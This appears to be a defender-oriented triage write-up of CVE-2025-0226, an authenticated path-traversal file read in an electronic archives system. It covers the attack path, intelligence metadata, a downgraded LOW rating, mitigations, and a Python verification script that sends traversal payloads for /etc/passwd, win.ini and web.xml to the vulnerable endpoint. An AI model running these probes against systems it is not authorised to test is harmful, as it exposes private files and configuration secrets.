01 · The Real Story
This is a locked filing room where any employee with a key may be able to peek into the wrong drawer
CVE-2025-0226 is a remote information-disclosure issue in Tsinghua Unigroup Electronic Archives System 3.2.210802(62532). The vulnerable function is the download handler at /collect/PortV4/downLoad.html; user-controlled path input can be manipulated to retrieve files the caller should not be able to read. The published CVSS v3.1 vector (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N) matters here: the attacker needs a valid low-privilege account or equivalent authenticated session.
The vendor's MEDIUM 4.3 is directionally fair in lab terms, but in enterprise prioritization this lands lower. The decisive friction is authenticated access to a niche archives application with read-only impact and no evidence of KEV listing or active exploitation; that sharply limits reachable population and blast radius compared with internet-edge unauthenticated flaws.
"Public PoC or not, this is still a niche authenticated file-read with limited blast radius"
02 · The Attack Path
4 steps from start to impact.
STEP 01
Obtain a valid application session
The attacker first needs a working user account or stolen session for the archives portal. In practice this means insider abuse, reused credentials, prior phishing success, or an already-compromised internal user. Tools commonly used at this stage include
Burp Suite, hydra, or ordinary browser login reuse.Conditions required:
- Attacker can reach the web application over the network
- A valid low-privilege account or authenticated session is available
- The affected build
3.2.210802(62532)is in use
Where this breaks in practice:
- This is not unauthenticated internet-edge exploitation
- SSO, MFA, VPN gating, or internal-only exposure often remove easy remote reachability
- The product appears niche, so the exposed population is much smaller than mass-market software
Detection/coverage: Most external scanners will miss this without authenticated checks. Good application inventory and authenticated web assessments are required.
STEP 02
Identify the vulnerable download endpoint
Once logged in, the attacker enumerates application paths and confirms the presence of
/collect/PortV4/downLoad.html. This is straightforward using browser dev tools, Burp Repeater, or content discovery tools like ffuf if the app does not hide routes.Conditions required:
- Authenticated browsing is possible
- The endpoint is deployed and reachable in the target instance
Where this breaks in practice:
- Some deployments may front the app with reverse proxies or ACLs that hide or restrict the route
- Custom rewrites or vendor hardening may change path behavior
Detection/coverage: WAF and reverse-proxy logs can catch unusual requests to
/collect/PortV4/downLoad.html, but only if that path is already monitored.STEP 03
Abuse the path parameter with public PoC logic
The attacker then uses the public exploitation approach referenced by NVD/VulDB and sends crafted requests that manipulate the
path argument. The likely operator tooling is the published BxYQ/ld PoC or a hand-built request in Burp Repeater or curl.Conditions required:
- The endpoint trusts user-supplied file path input
- The authenticated user is allowed to invoke the download function
Where this breaks in practice:
- Application-side canonicalization, proxy filtering, or route blocking can stop the exploit
- The file read still inherits whatever permissions the app process actually has
Detection/coverage: If you log query strings or POST bodies, traversal-like values and repeated file-read attempts are detectable. Generic vuln scanners may flag the CVE only when authenticated plugins exist.
STEP 04
Read exposed files and harvest archive data
Successful exploitation yields unauthorized file disclosure rather than code execution. The practical impact is exposure of archive content, metadata, or configuration files that the application account can access; that can still be sensitive in records-heavy environments, but it is not direct host takeover.
Conditions required:
- Readable target files exist under the app's effective permissions
- Responses are returned to the caller without secondary authorization checks
Where this breaks in practice:
- Confidentiality impact is bounded by file-system permissions and app reach
- No direct integrity or availability impact is described in the record
- Lateral movement still requires follow-on weaknesses or exposed secrets
Detection/coverage: Look for bursts of downloads, unusual file names, path-like parameter values, and archive reads outside normal user workflows.
03 · Intelligence Metadata
The supporting signals.
| In-the-wild status | No authoritative evidence of active exploitation found in the reviewed sources; not listed in CISA KEV. |
|---|---|
| Proof-of-concept availability | Yes. NVD/OpenCVE/VulDB-derived records reference a public GitHub PoC under BxYQ/ld for file_read2. |
| EPSS | 0.0016 from the user-provided intel; reviewed authoritative sources confirm EPSS methodology but I did not confirm a current percentile from an authoritative per-CVE feed. |
| KEV status | No. CISA's Known Exploited Vulnerabilities Catalog did not show this CVE in the reviewed catalog source. |
| CVSS vector and meaning | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N = remote, low complexity, authenticated, confidentiality-only, no integrity or availability loss. |
| Affected versions | Reviewed records consistently name Tsinghua Unigroup Electronic Archives System 3.2.210802(62532). |
| Fixed version | No authoritative fixed version was identified in the reviewed sources. Multiple records explicitly state that no newer fixed build information was available at publication time. |
| Exposure/scanning data | I did not find a reliable public Shodan/Censys/FOFA fingerprint or exposure count tied specifically to this product and endpoint, which itself is a downward signal on broad internet-scale reachability confidence. |
| Disclosure timeline | CNA/OpenCVE timeline shows disclosure on 2025-01-04 and NVD publication on 2025-01-05. |
| Reporter/source of record | The CVE source is VulDB per NVD/OpenCVE; detailed reporting researcher attribution was not clearly exposed in the reviewed public pages. |
04 · The Call
noisgate verdict.
Final Verdict
↓ DOWNGRADED to LOW (3.1/10)
The single biggest reason this drops to LOW is the authenticated-access requirement: this is a post-login data exposure bug, not an internet-edge initial-access bug. Public PoC availability keeps it from being ignored, but the reachable population and immediate blast radius are both materially constrained.
HIGH Auth requirement and confidentiality-only impact
MEDIUM Absence of active exploitation evidence and KEV status
LOW Internet exposure prevalence for this specific product family
Why this verdict
- Score down for attacker position — vendor starts at 4.3, but
PR:Lis not cosmetic here. Requiring an authenticated archives-system user implies insider abuse, credential theft, or prior compromise, so this is already one stage past initial access. - Score down for population reach — this is a niche enterprise records platform, not a broadly deployed edge appliance. I found no reliable public exposure fingerprint or count, which argues against mass opportunistic abuse at internet scale.
- Score down for impact shape — the described outcome is read-only disclosure with
C:Land no integrity or availability loss. Even if sensitive documents are exposed, this is still a narrower blast radius than auth-bypass, RCE, or privilege-escalation flaws.
Why not higher?
There is no authoritative evidence here of KEV listing, ransomware use, or active campaigns. More importantly, the exploit chain does not begin with anonymous internet reach; it begins with a valid user session on a specialized application and ends in file disclosure, not takeover.
Why not lower?
This is still remotely exploitable once authenticated, and a public PoC exists. On a records platform, even a 'low' confidentiality-only read can expose regulated documents, internal procedures, or configuration secrets, so documenting and remediating it as backlog hygiene is still warranted.
05 · Compensating Control
What to do — in priority order.
- Block the endpoint upstream — Restrict access to
/collect/PortV4/downLoad.htmlat the reverse proxy, WAF, or load balancer if business use allows it. For a LOW verdict there is no mitigation SLA; treat this as backlog hygiene, but do it sooner wherever the app is externally reachable. - Tighten who can log in — Reduce the authenticated population through SSO policy, MFA, VPN/internal-only exposure, and least-privilege roles. This matters because the exploit only becomes real after login; for LOW, there is no mitigation SLA, so fold it into normal access-hardening work unless exposure is public.
- Monitor the download route — Add explicit alerting on requests to
/collect/PortV4/downLoad.html, especially those with suspiciouspathvalues, repeated download failures, or anomalous file names. For LOW, no mitigation SLA applies, but this is cheap detection coverage you can add during regular logging improvements. - Constrain app-file permissions — Review the OS account running the application and remove unnecessary read access to sensitive directories and config stores. That does not fix the bug, but it sharply limits what the bug can leak; for LOW, schedule it as backlog hygiene unless the host stores highly sensitive archives.
What doesn't work
- A generic endpoint AV agent does not stop a legitimate web app from returning a file it is allowed to read.
- Network segmentation alone does not help if the attacker already has portal access from the allowed network path.
- Relying on CVSS alone overstates urgency here; the real limiter is the need for authenticated access to a niche application.
06 · Verification
Crowdsourced verification payload.
Run this from an auditor workstation or a controlled assessment host that can reach the target web app. Invoke it as python3 verify_cve_2025_0226.py --url https://target.example.com --cookie "JSESSIONID=..."; no local admin rights are needed, but you do need a valid low-privilege application session if the portal enforces authentication.
#!/usr/bin/env python3
# verify_cve_2025_0226.py
# Active check for CVE-2025-0226 against Tsinghua Unigroup Electronic Archives System
# Exit codes: 0=PATCHED, 1=VULNERABLE, 2=UNKNOWN, 3=usage/error
import argparse
import re
import sys
import urllib.parse
import urllib.request
import urllib.error
WINDOWS_SIGS = [r"\[fonts\]", r"for 16-bit app support", r"\[extensions\]"]
UNIX_SIGS = [r"root:x:0:0:", r"localhost", r"127\.0\.0\.1"]
JAVA_SIGS = [r"<web-app", r"<display-name", r"<servlet"]
BLOCK_SIGS = [r"forbidden", r"illegal", r"invalid", r"denied", r"not allowed", r"blocked"]
def fetch(url, cookie=None, timeout=10):
req = urllib.request.Request(url, headers={
"User-Agent": "noisgate-cve-2025-0226-verifier/1.0"
})
if cookie:
req.add_header("Cookie", cookie)
try:
with urllib.request.urlopen(req, timeout=timeout) as resp:
body = resp.read(8192)
return resp.getcode(), body.decode("utf-8", errors="ignore"), dict(resp.headers)
except urllib.error.HTTPError as e:
try:
body = e.read(8192).decode("utf-8", errors="ignore")
except Exception:
body = ""
return e.code, body, dict(e.headers)
except Exception:
return None, "", {}
def looks_like_login(body, headers):
loc = headers.get("Location", "") or headers.get("location", "")
text = (body + "\n" + loc).lower()
return any(x in text for x in ["login", "signin", "sso", "cas", "auth"])
def matches_any(body, patterns):
for p in patterns:
if re.search(p, body, re.IGNORECASE):
return True
return False
def main():
ap = argparse.ArgumentParser(description="Verify CVE-2025-0226 via controlled active probe")
ap.add_argument("--url", required=True, help="Base URL, e.g. https://target.example.com")
ap.add_argument("--cookie", default="", help="Authenticated session cookie string")
args = ap.parse_args()
base = args.url.rstrip("/")
endpoint = base + "/collect/PortV4/downLoad.html"
# Candidate probes: Windows, Unix, Java app config
probes = [
"../../../../../../Windows/win.ini",
"../../../../../../windows/win.ini",
"../../../../../../etc/hosts",
"../../../../../../etc/passwd",
"../../../../../../WEB-INF/web.xml",
]
saw_block = False
saw_auth_gate = False
saw_endpoint = False
for candidate in probes:
q = urllib.parse.urlencode({"path": candidate})
url = endpoint + "?" + q
code, body, headers = fetch(url, cookie=args.cookie)
if code is None:
continue
if code in (200, 206, 400, 401, 403, 404, 500, 302):
saw_endpoint = True
if code in (401, 403) or looks_like_login(body, headers):
saw_auth_gate = True
continue
if matches_any(body, WINDOWS_SIGS) or matches_any(body, UNIX_SIGS) or matches_any(body, JAVA_SIGS):
print("VULNERABLE")
sys.exit(1)
if code in (400, 403, 404) and matches_any(body, BLOCK_SIGS):
saw_block = True
if saw_auth_gate and not args.cookie:
print("UNKNOWN")
sys.exit(2)
if saw_block:
print("PATCHED")
sys.exit(0)
if saw_endpoint:
print("UNKNOWN")
sys.exit(2)
print("UNKNOWN")
sys.exit(2)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("UNKNOWN")
sys.exit(2)
except Exception:
print("UNKNOWN")
sys.exit(2)
07 · Bottom Line
If you remember one thing.
TL;DR
Monday morning: first decide whether this archives app is internet-reachable and whether ordinary users can hit
/collect/PortV4/downLoad.html. For a LOW verdict, noisgate mitigation SLA is no SLA and noisgate remediation SLA is backlog hygiene rather than a fixed-day clock, so document exposure, add route monitoring, and fold vendor update or compensating access restrictions into the next normal maintenance cycle; if the app is externally exposed or stores highly sensitive records, accelerate it locally even though the bucket stays LOW.Sources
Peer Review
What defenders are saying.
Submit a review
attribution: handle + country only
0 flags selected · stored anonymously
Validation Results
Crowdsourced verification outputs.
Results submitted by users who ran the verification payload against their environment.